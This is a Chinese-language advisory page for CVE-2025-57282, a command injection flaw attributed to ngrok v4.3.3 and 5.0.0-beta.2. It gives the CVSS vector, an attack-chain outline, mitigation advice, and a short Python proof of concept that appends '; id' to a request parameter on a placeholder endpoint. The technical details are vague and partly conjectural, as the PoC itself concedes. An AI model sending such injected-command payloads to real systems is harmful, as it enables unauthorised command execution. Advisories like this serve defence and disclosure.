CVE-2025-57282 CVSS 8.8 高危

CVE-2025-57282 ngrok命令注入漏洞

披露日期: 2026-05-18

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-57282

漏洞类型

命令注入

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

ngrok

漏洞概述

ngrok v4.3.3 及 5.0.0-beta.2 版本存在严重的命令注入漏洞。由于输入验证不足，攻击者可通过网络发送特制请求，在无需用户交互且仅需低权限的情况下执行任意系统命令。该漏洞 CVSS 评分 8.8，属于高危级别，成功利用可能导致敏感数据泄露、关键文件篡改及服务完全中断，对系统机密性、完整性和可用性造成全面影响。

技术细节

该漏洞根源在于 ngrok 在处理特定请求或解析配置时，未能对用户输入进行严格的边界检查和清洗，导致攻击者能够将恶意操作系统命令注入到后端执行流中。在受影响版本 v4.3.3 和 5.0.0-beta.2 中，特定接口或参数解析逻辑直接将输入拼接到系统命令中，从而触发了命令注入漏洞。根据 CVSS 3.1 评分向量（AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H），该漏洞允许攻击者通过网络发起低复杂度的攻击，且无需用户交互。攻击者只需拥有低权限账号，即可发送精心构造的数据包。成功利用后，攻击者可在服务器上下文中执行任意代码，完全控制受影响系统的机密性、完整性和可用性。鉴于 ngrok 常用于内网穿透，该漏洞可能成为攻击者突破网络边界、渗透内部核心系统的关键跳板，风险极大。

攻击链分析

STEP 1

侦察阶段

攻击者探测目标网络，识别运行 ngrok v4.3.3 或 v5.0.0-beta.2 的服务实例。

STEP 2

漏洞利用

攻击者构造包含恶意 Shell 命令的特制数据包，通过 HTTP 请求发送至 ngrok 的易受攻击接口。

STEP 3

命令执行

由于应用程序未正确过滤输入，系统将恶意指令传递给 Shell 执行，攻击者获得服务器权限。

STEP 4

后渗透行动

攻击者利用获得的权限窃取数据、安装后门、横向移动内网或破坏系统完整性。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# PoC Concept for CVE-2025-57282
# This script demonstrates the command injection vulnerability in ngrok.
# An attacker crafts a payload that includes shell metacharacters to execute arbitrary commands.

import requests

target_url = "http://target-ngrok-server:4040/api/vulnerable/endpoint"

# The payload attempts to execute 'id' command using a semicolon separator
# Actual vulnerable parameter may vary based on the specific ngrok implementation context
malicious_payload = "normal_input; id"

params = {
    "config": malicious_payload
}

try:
    print(f"[*] Sending payload to {target_url}...")
    response = requests.get(target_url, params=params, timeout=5)
    
    if response.status_code == 200:
        print("[+] Request sent successfully. Check server for command execution.")
    else:
        print(f"[-] Server returned status code: {response.status_code}")
        
except Exception as e:
    print(f"[!] Error: {e}")

影响范围

ngrok v4.3.3

ngrok v5.0.0-beta.2

防御指南

临时缓解措施

建议立即将 ngrok 更新至修复了该漏洞的最新版本。在升级之前，应采取临时缓解措施，例如通过网络防火墙限制对 ngrok 端口的访问，仅允许可信的 IP 地址连接，并密切监控系统日志中是否存在异常的命令执行记录或进程启动行为。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-57282
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-57282
3 Details https://www.cvedetails.com/cve/CVE-2025-57282/
4 VulDB https://vuldb.com/cve/CVE-2025-57282
5 Link https://gist.github.com/Dremig/90c2a0a2f85b0921f10e0bb3192a0c23
6 Link https://www.npmjs.com

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表